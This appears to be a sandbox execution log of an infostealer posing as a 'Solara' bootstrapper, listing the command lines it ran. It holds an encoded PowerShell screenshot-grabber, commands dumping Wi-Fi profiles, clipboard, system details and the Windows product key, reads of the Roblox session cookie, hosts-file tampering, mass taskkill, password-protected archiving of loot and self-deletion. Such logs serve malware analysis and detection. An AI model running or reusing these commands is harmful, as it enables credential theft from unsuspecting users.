LQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA="

C:\Windows\system32\netsh.exe

netsh wlan show profile

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Get-Clipboard

C:\Windows\system32\tasklist.exe

tasklist /FO LIST

C:\Windows\system32\tree.com

tree /A /F

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /PID 3708"

C:\Windows\system32\systeminfo.exe

systeminfo

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA=

C:\Windows\system32\reg.exe

REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "tree /A /F"

C:\Windows\system32\taskkill.exe

taskkill /F /PID 3708

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "attrib -r C:\Windows\System32\drivers\etc\hosts"

C:\Windows\system32\tree.com

tree /A /F

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "tree /A /F"

C:\Windows\system32\attrib.exe

attrib -r C:\Windows\System32\drivers\etc\hosts

C:\Windows\system32\tree.com

tree /A /F

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "attrib +r C:\Windows\System32\drivers\etc\hosts"

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe

"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\wfwswdeb\wfwswdeb.cmdline"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "tree /A /F"

C:\Windows\system32\attrib.exe

attrib +r C:\Windows\System32\drivers\etc\hosts

C:\Windows\system32\tree.com

tree /A /F

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "tree /A /F"

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES851E.tmp" "c:\Users\Admin\AppData\Local\Temp\wfwswdeb\CSC3ABD9D9AB8E94A44BC907B8A4CB48398.TMP"

C:\Windows\system32\tasklist.exe

tasklist /FO LIST

C:\Windows\system32\tree.com

tree /A /F

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /PID 1748"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "tree /A /F"

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\system32\tree.com

tree /A /F

C:\Windows\system32\taskkill.exe

taskkill /F /PID 1748

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /PID 4456"

C:\Windows\system32\taskkill.exe

taskkill /F /PID 4456

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /PID 3884"

C:\Windows\system32\taskkill.exe

taskkill /F /PID 3884

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /PID 2324"

C:\Windows\system32\taskkill.exe

taskkill /F /PID 2324

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /PID 4660"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /PID 3708"

C:\Windows\system32\taskkill.exe

taskkill /F /PID 4660

C:\Windows\system32\taskkill.exe

taskkill /F /PID 3708

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /PID 1384"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /PID 1748"

C:\Windows\system32\taskkill.exe

taskkill /F /PID 1384

C:\Windows\system32\taskkill.exe

taskkill /F /PID 1748

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /PID 1508"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /PID 4456"

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\system32\taskkill.exe

taskkill /F /PID 1508

C:\Windows\system32\taskkill.exe

taskkill /F /PID 4456

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /PID 3960"

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /PID 3884"

C:\Windows\system32\taskkill.exe

taskkill /F /PID 3960

C:\Windows\system32\taskkill.exe

taskkill /F /PID 3884

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /PID 3120"

C:\Windows\system32\wbem\wmiprvse.exe

C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /PID 2324"

C:\Windows\system32\taskkill.exe

taskkill /F /PID 3120

C:\Windows\system32\taskkill.exe

taskkill /F /PID 2324

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /PID 4660"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"

C:\Windows\system32\taskkill.exe

taskkill /F /PID 4660

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /PID 1384"

C:\Windows\system32\taskkill.exe

taskkill /F /PID 1384

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /PID 1508"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"

C:\Windows\system32\taskkill.exe

taskkill /F /PID 1508

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /PID 3960"

C:\Windows\system32\taskkill.exe

taskkill /F /PID 3960

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /PID 3120"

C:\Windows\system32\taskkill.exe

taskkill /F /PID 3120

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "getmac"

C:\Windows\system32\getmac.exe

getmac

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\_MEI23162\rar.exe a -r -hp"clavvic" "C:\Users\Admin\AppData\Local\Temp\kpbWJ.zip" *"

C:\Users\Admin\AppData\Local\Temp\_MEI23162\rar.exe

C:\Users\Admin\AppData\Local\Temp\_MEI23162\rar.exe a -r -hp"clavvic" "C:\Users\Admin\AppData\Local\Temp\kpbWJ.zip" *

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "wmic os get Caption"

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\System32\Wbem\WMIC.exe

wmic os get Caption

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "wmic computersystem get totalphysicalmemory"

C:\Windows\System32\Wbem\WMIC.exe

wmic computersystem get totalphysicalmemory

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"

C:\Windows\System32\Wbem\WMIC.exe

wmic csproduct get uuid

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\System32\Wbem\WMIC.exe

wmic path win32_VideoController get name

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "ping localhost -n 3 > NUL && del /A H /F "C:\Users\Admin\AppData\Local\Temp\SolaraV2.83\Solara\SolaraBootstrapper.exe""

C:\Windows\system32\PING.EXE

ping localhost -n 3

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument C:\Users\Admin\Desktop\ConvertToSearch.mht

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x11c,0x120,0x124,0xf8,0x128,0x7ffd890546f8,0x7ffd89054708,0x7ffd89054718

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2036,5468015621481243386,6003461982466912380,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2080 /prefetch:2

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2036,5468015621481243386,6003461982466912380,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2148 /prefetch:3

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2036,5468015621481243386,6003461982466912380,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2868 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2036,5468015621481243386,6003461982466912380,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3248 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2036,5468015621481243386,6003461982466912380,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3264 /prefetch:1

C:\Windows\System32\CompPkgSrv.exe

C:\Windows\System32\CompPkgSrv.exe -Embedding

C:\Windows\System32\CompPkgSrv.exe

C:\Windows\System32\CompPkgSrv.exe -Embedding

C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2036,5468015621481243386,6003461982466912380,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5208 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2036,5468015621481243386,6003461982466912380,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5208 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2036,5468015621481243386,6003461982466912380,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5536 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2036,5468015621481243386,6003461982466912380,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3580 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --field-trial-handle=2036,5468015621481243386,6003461982466912380,131072 --lang=en-US --service-sandbox-type=audio --mojo-platform-channel-handle=5544 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=video_capture.mojom.VideoCaptureService --field-trial-handle=2036,5468015621481243386,6003461982466912380,131072 --lang=en-US --service-sandbox-type=video_capture --mojo-platform-channel-handle=5604 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2036,5468015621481243386,6003461982466912380,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5464 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2036,5468015621481243386,6003461982466912380,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3580 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2036,5468015621481243386,6003461982466912380,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5952 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2036,5468015621481243386,6003461982466912380,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6112 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2036,5468015621481243386,6003461982466912380,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5924 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2036,5468015621481243386,6003461982466912380,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=17 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3512 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2036,5468015621481243386,6003461982466912380,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=18 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5980 /prefetch:1

C:\Windows\system32\AUDIODG.EXE

C:\Windows\system32\AUDIODG.EXE 0x150 0x2ec

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2036,5468015621481243386,6003461982466912380,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=19 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6280 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2036,5468015621481243386,6003461982466912380,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=20 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6128 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2036,5468015621481243386,6003461982466912380,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=21 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3968 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2036,5468015621481243386,6003461982466912380,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=22 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6068 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2036,5468015621481243386,6003461982466912380,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=23 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6592 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2036,5468015621481243386,6003461982466912380,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=24 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6676 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2036,5468015621481243386,6003461982466912380,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=25 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5968 /prefetch:1

C:\Windows\System32\CompPkgSrv.exe

C:\Windows\System32\CompPkgSrv.exe -Embedding

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

